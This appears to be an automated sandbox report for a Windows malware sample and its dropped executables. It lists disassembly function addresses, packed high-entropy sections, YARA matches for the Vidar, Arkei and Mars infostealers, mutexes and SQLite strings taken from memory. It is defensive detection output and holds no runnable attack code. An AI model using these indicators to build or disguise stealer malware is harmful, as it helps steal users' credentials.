                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6093F42E17_2_6093F42E
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6095447017_2_60954470
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_609615FA17_2_609615FA
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6096A5EE17_2_6096A5EE
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6096D6A417_2_6096D6A4
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_609606A817_2_609606A8
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6093265417_2_60932654
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6095566517_2_60955665
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6094B7DB17_2_6094B7DB
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6092F74D17_2_6092F74D
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6096480717_2_60964807
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6094E9BC17_2_6094E9BC
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6093792917_2_60937929
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6093FAD617_2_6093FAD6
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6096DAE817_2_6096DAE8
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_60936B2717_2_60936B27
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_60954CF617_2_60954CF6
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_60950C6B17_2_60950C6B
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_60966DF117_2_60966DF1
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_60963D3517_2_60963D35
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_60909E9C17_2_60909E9C
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_60951E8617_2_60951E86
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_60912E0B17_2_60912E0B
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_60954FF817_2_60954FF8
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_0064806018_2_00648060
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006B204618_2_006B2046
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006A829818_2_006A8298
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_0067E4FF18_2_0067E4FF
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_0067676B18_2_0067676B
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006D487318_2_006D4873
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_0064CAF018_2_0064CAF0
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_0066CAA018_2_0066CAA0
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_0065CC3918_2_0065CC39
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_00676DD918_2_00676DD9
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_0065D06418_2_0065D064
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_0065B11918_2_0065B119
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006491C018_2_006491C0
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_0066139418_2_00661394
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_0066170618_2_00661706
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_0066781B18_2_0066781B
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_0065997D18_2_0065997D
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_0064792018_2_00647920
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006619B018_2_006619B0
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_00667A4A18_2_00667A4A
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_00661C7718_2_00661C77
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_00667CA718_2_00667CA7
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006CBE4418_2_006CBE44
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_00679EEE18_2_00679EEE
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_0064BF4018_2_0064BF40
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_00661F3218_2_00661F32
                                      Source: Joe Sandbox ViewDropped File: C:\ProgramData\freebl3.dll A770ECBA3B08BBABD0A567FC978E50615F8B346709F8EB3CFACF3FAAB24090BA
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeCode function: String function: 00403F50 appears 136 times
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeCode function: String function: 0040A570 appears 56 times
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: String function: 0096A570 appears 56 times
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: String function: 00963F50 appears 136 times
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: String function: 004054F0 appears 577 times
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: String function: 0065F9F2 appears 40 times
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: String function: 00660A30 appears 46 times
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4780 -s 888
                                      Source: unicodedata.pyd.35.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                                      Source: win32ui.pyd.35.drStatic PE information: Resource name: RT_CURSOR type: 64-bit XCOFF executable or object module
                                      Source: win32ui.pyd.35.drStatic PE information: Resource name: None type: COM executable for DOS
                                      Source: api-ms-win-core-file-l1-2-0.dll.35.drStatic PE information: No import functions for PE file found
                                      Source: api-ms-win-core-memory-l1-1-0.dll.35.drStatic PE information: No import functions for PE file found
                                      Source: api-ms-win-core-file-l1-1-0.dll.35.drStatic PE information: No import functions for PE file found
                                      Source: api-ms-win-core-heap-l1-1-0.dll.35.drStatic PE information: No import functions for PE file found
                                      Source: api-ms-win-crt-multibyte-l1-1-0.dll.35.drStatic PE information: No import functions for PE file found
                                      Source: api-ms-win-core-sysinfo-l1-1-0.dll.35.drStatic PE information: No import functions for PE file found
                                      Source: api-ms-win-core-processthreads-l1-1-1.dll.35.drStatic PE information: No import functions for PE file found
                                      Source: api-ms-win-crt-utility-l1-1-0.dll.35.drStatic PE information: No import functions for PE file found
                                      Source: api-ms-win-core-profile-l1-1-0.dll.35.drStatic PE information: No import functions for PE file found
                                      Source: api-ms-win-core-console-l1-1-0.dll.35.drStatic PE information: No import functions for PE file found
                                      Source: api-ms-win-crt-locale-l1-1-0.dll.35.drStatic PE information: No import functions for PE file found
                                      Source: api-ms-win-crt-convert-l1-1-0.dll.35.drStatic PE information: No import functions for PE file found
                                      Source: api-ms-win-crt-environment-l1-1-0.dll.35.drStatic PE information: No import functions for PE file found
                                      Source: api-ms-win-core-localization-l1-2-0.dll.35.drStatic PE information: No import functions for PE file found
                                      Source: api-ms-win-core-processthreads-l1-1-0.dll.35.drStatic PE information: No import functions for PE file found
                                      Source: python3.dll.35.drStatic PE information: No import functions for PE file found
                                      Source: api-ms-win-crt-process-l1-1-0.dll.35.drStatic PE information: No import functions for PE file found
                                      Source: api-ms-win-core-string-l1-1-0.dll.35.drStatic PE information: No import functions for PE file found
                                      Source: api-ms-win-core-synch-l1-2-0.dll.35.drStatic PE information: No import functions for PE file found
                                      Source: api-ms-win-core-synch-l1-1-0.dll.35.drStatic PE information: No import functions for PE file found
                                      Source: api-ms-win-core-debug-l1-1-0.dll.35.drStatic PE information: No import functions for PE file found
                                      Source: api-ms-win-core-handle-l1-1-0.dll.35.drStatic PE information: No import functions for PE file found
                                      Source: api-ms-win-crt-filesystem-l1-1-0.dll.35.drStatic PE information: No import functions for PE file found
                                      Source: api-ms-win-core-errorhandling-l1-1-0.dll.35.drStatic PE information: No import functions for PE file found
                                      Source: api-ms-win-crt-heap-l1-1-0.dll.35.drStatic PE information: No import functions for PE file found
                                      Source: api-ms-win-core-rtlsupport-l1-1-0.dll.35.drStatic PE information: No import functions for PE file found
                                      Source: api-ms-win-crt-string-l1-1-0.dll.35.drStatic PE information: No import functions for PE file found
                                      Source: api-ms-win-core-util-l1-1-0.dll.35.drStatic PE information: No import functions for PE file found
                                      Source: api-ms-win-core-file-l2-1-0.dll.35.drStatic PE information: No import functions for PE file found
                                      Source: api-ms-win-crt-conio-l1-1-0.dll.35.drStatic PE information: No import functions for PE file found
                                      Source: api-ms-win-crt-math-l1-1-0.dll.35.drStatic PE information: No import functions for PE file found
                                      Source: api-ms-win-crt-time-l1-1-0.dll.35.drStatic PE information: No import functions for PE file found
                                      Source: api-ms-win-core-libraryloader-l1-1-0.dll.35.drStatic PE information: No import functions for PE file found
                                      Source: api-ms-win-crt-runtime-l1-1-0.dll.35.drStatic PE information: No import functions for PE file found
                                      Source: api-ms-win-core-processenvironment-l1-1-0.dll.35.drStatic PE information: No import functions for PE file found
                                      Source: api-ms-win-core-datetime-l1-1-0.dll.35.drStatic PE information: No import functions for PE file found
                                      Source: api-ms-win-core-timezone-l1-1-0.dll.35.drStatic PE information: No import functions for PE file found
                                      Source: api-ms-win-core-namedpipe-l1-1-0.dll.35.drStatic PE information: No import functions for PE file found
                                      Source: api-ms-win-crt-stdio-l1-1-0.dll.35.drStatic PE information: No import functions for PE file found
                                      Source: api-ms-win-core-interlocked-l1-1-0.dll.35.drStatic PE information: No import functions for PE file found
                                      Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                                      Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                                      Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                                      Source: M6gQuZPvgY.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_ArkeiStealer_84c7086a reference_sample = 708d9fb40f49192d4bf6eff62e0140c920a7eca01b9f78aeaf558bef0115dbe2, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.ArkeiStealer, fingerprint = f1d701463b0001de8996b30d2e36ddecb93fe4ca2a1a26fc4fcdaeb0aa3a3d6d, id = 84c7086a-abc3-4b97-b325-46a078b90a95, last_modified = 2022-04-12
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_mars_stealer_xor_routine author = Sekoia.io, description = Detect Mars Stealer based on a specific XOR routine, creation_date = 2022-04-06, classification = TLP:CLEAR, version = 1.0, id = 3e2c7440b2fc9e4b039e6fa8152ac8ff
                                      Source: 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
                                      Source: 00000011.00000002.1518022147.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORYMatched rule: Windows_Trojan_ArkeiStealer_84c7086a reference_sample = 708d9fb40f49192d4bf6eff62e0140c920a7eca01b9f78aeaf558bef0115dbe2, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.ArkeiStealer, fingerprint = f1d701463b0001de8996b30d2e36ddecb93fe4ca2a1a26fc4fcdaeb0aa3a3d6d, id = 84c7086a-abc3-4b97-b325-46a078b90a95, last_modified = 2022-04-12
                                      Source: Process Memory Space: m0wsoI3.exe PID: 5132, type: MEMORYSTRMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
                                      Source: decrypted.memstr, type: MEMORYSTRMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
                                      Source: decrypted.memstr, type: MEMORYSTRMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
                                      Source: m0wsoI3[1].exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      Source: m0wsoI3.exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      Source: M6gQuZPvgY.exeStatic PE information: Section: zwbixhzy ZLIB complexity 0.9943893748127061
                                      Source: rapes.exe.0.drStatic PE information: Section: zwbixhzy ZLIB complexity 0.9943893748127061
                                      Source: UD49QH6[1].exe.6.drStatic PE information: Section: ZLIB complexity 0.9994006849315068
                                      Source: UD49QH6[1].exe.6.drStatic PE information: Section: nafweblw ZLIB complexity 0.9946239951615361
                                      Source: UD49QH6.exe.6.drStatic PE information: Section: ZLIB complexity 0.9994006849315068
                                      Source: UD49QH6.exe.6.drStatic PE information: Section: nafweblw ZLIB complexity 0.9946239951615361
                                      Source: random[1].exe0.6.drStatic PE information: Section: ZLIB complexity 0.998999091066482
                                      Source: random[1].exe0.6.drStatic PE information: Section: zzezzonx ZLIB complexity 0.9948263598127284
                                      Source: c1f0508103.exe.6.drStatic PE information: Section: ZLIB complexity 0.998999091066482
                                      Source: c1f0508103.exe.6.drStatic PE information: Section: zzezzonx ZLIB complexity 0.9948263598127284
                                      Source: random[2].exe.6.drStatic PE information: Section: lmgreshx ZLIB complexity 0.994475076311426
                                      Source: 83f34278c7.exe.6.drStatic PE information: Section: lmgreshx ZLIB complexity 0.994475076311426
                                      Source: random[1].exe1.6.drStatic PE information: Section: jtqqduow ZLIB complexity 0.9945868862443779
                                      Source: 0629403be8.exe.6.drStatic PE information: Section: jtqqduow ZLIB complexity 0.9945868862443779
                                      Source: random[1].exe2.6.drStatic PE information: Section: tojgfqvj ZLIB complexity 0.9946281566625729
                                      Source: d101bd5267.exe.6.drStatic PE information: Section: tojgfqvj ZLIB complexity 0.9946281566625729
                                      Source: cronikxqqq[1].exe.15.drStatic PE information: Section: .CSS ZLIB complexity 1.0003273242728532
                                      Source: cronikxqqq.exe.15.drStatic PE information: Section: .CSS ZLIB complexity 1.0003273242728532
                                      Source: v7942[1].exe.15.drStatic PE information: Section: .bss ZLIB complexity 1.0003622159090908
                                      Source: v7942.exe.15.drStatic PE information: Section: .bss ZLIB complexity 1.0003622159090908
                                      Source: crypted.7[1].exe.15.drStatic PE information: Section: .bss ZLIB complexity 1.0003231990014265
                                      Source: crypted.exe.15.drStatic PE information: Section: .bss ZLIB complexity 1.0003231990014265
                                      Source: crypted.41[1].exe.15.drStatic PE information: Section: .bss ZLIB complexity 1.0003231990014265
                                      Source: crypted.exe0.15.drStatic PE information: Section: .bss ZLIB complexity 1.0003231990014265
                                      Source: mrwipre12[1].exe.15.drStatic PE information: Section: .bss ZLIB complexity 1.0003352171985815
                                      Source: mrwipre12.exe.15.drStatic PE information: Section: .bss ZLIB complexity 1.0003352171985815
                                      Source: TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE.25.drStatic PE information: Section: zwbixhzy ZLIB complexity 0.9943893748127061
                                      Source: libcrypto-3.dll.35.drStatic PE information: Section: UPX1 ZLIB complexity 0.9989805572769122
                                      Source: libssl-3.dll.35.drStatic PE information: Section: UPX1 ZLIB complexity 0.9920756022135416
                                      Source: python311.dll.35.drStatic PE information: Section: UPX1 ZLIB complexity 0.9993348982785603
                                      Source: pythoncom311.dll.35.drStatic PE information: Section: UPX1 ZLIB complexity 0.9892076567220544
                                      Source: unicodedata.pyd.35.drStatic PE information: Section: UPX1 ZLIB complexity 0.9945956541218638
                                      Source: _cffi.cp311-win_amd64.pyd.35.drStatic PE information: Section: UPX1 ZLIB complexity 0.9908387947570333
                                      Source: _imaging.cp311-win_amd64.pyd.35.drStatic PE information: Section: UPX1 ZLIB complexity 0.9978805954391892
                                      Source: _imagingft.cp311-win_amd64.pyd.35.drStatic PE information: Section: UPX1 ZLIB complexity 0.9979953670705631
                                      Source: _webp.cp311-win_amd64.pyd.35.drStatic PE information: Section: UPX1 ZLIB complexity 0.9907634636167147
                                      Source: win32ui.pyd.35.drStatic PE information: Section: UPX1 ZLIB complexity 0.9937741537846482
                                      Source: backend_c.cp311-win_amd64.pyd.35.drStatic PE information: Section: UPX1 ZLIB complexity 0.9894116950757575
                                      Source: random[1].exe1.6.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                                      Source: 0629403be8.exe.6.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                                      Source: cronikxqqq[1].exe.15.dr, gBMthepoZSL1ZVKpeA.csCryptographic APIs: 'CreateDecryptor'
                                      Source: cronikxqqq[1].exe.15.dr, gBMthepoZSL1ZVKpeA.csCryptographic APIs: 'CreateDecryptor'
                                      Source: cronikxqqq[1].exe.15.dr, gBMthepoZSL1ZVKpeA.csCryptographic APIs: 'CreateDecryptor'
                                      Source: cronikxqqq.exe.15.dr, gBMthepoZSL1ZVKpeA.csCryptographic APIs: 'CreateDecryptor'
                                      Source: cronikxqqq.exe.15.dr, gBMthepoZSL1ZVKpeA.csCryptographic APIs: 'CreateDecryptor'
                                      Source: cronikxqqq.exe.15.dr, gBMthepoZSL1ZVKpeA.csCryptographic APIs: 'CreateDecryptor'
                                      Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@112/196@0/14
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006B37B5 GetLastError,FormatMessageW,18_2_006B37B5
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006A10BF AdjustTokenPrivileges,CloseHandle,18_2_006A10BF
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006A16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,18_2_006A16C3
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006B51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,18_2_006B51CD
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006CA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,18_2_006CA67C
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006B648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,18_2_006B648E
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006442A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,18_2_006442A2
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\amnew[1].exeJump to behavior
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7276:120:WilError_03
                                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5896:120:WilError_03
                                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4780
                                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3396:120:WilError_03
                                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6348:120:WilError_03
                                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2264:120:WilError_03
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeMutant created: \Sessions\1\BaseNamedObjects\c1ec479e5342a25940592acf24703eb2
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3528:120:WilError_03
                                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2856:120:WilError_03
                                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4768:120:WilError_03
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeFile created: C:\Users\user\AppData\Local\Temp\bb556cff4aJump to behavior
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeFile read: C:\Users\desktop.iniJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                      Source: m0wsoI3.exe, m0wsoI3.exe, 00000011.00000002.1529917240.000000000F0EB000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1533283917.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                                      Source: m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                                      Source: m0wsoI3.exe, 00000011.00000002.1529917240.000000000F0EB000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1533283917.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                                      Source: m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
                                      Source: m0wsoI3.exe, m0wsoI3.exe, 00000011.00000002.1529917240.000000000F0EB000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1533283917.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                                      Source: m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                                      Source: m0wsoI3.exe, 00000011.00000002.1529917240.000000000F0EB000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1533283917.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
                                      Source: m0wsoI3.exe, 00000011.00000002.1529917240.000000000F0EB000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1533283917.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                                      Source: m0wsoI3.exe, 00000011.00000002.1529917240.000000000F0EB000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1533283917.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                                      Source: m0wsoI3.exe, 00000011.00000002.1529917240.000000000F0EB000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1533283917.000000006096F000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                                      Source: m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                                      Source: m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                                      Source: m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                                      Source: m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT ALL id FROM %s;
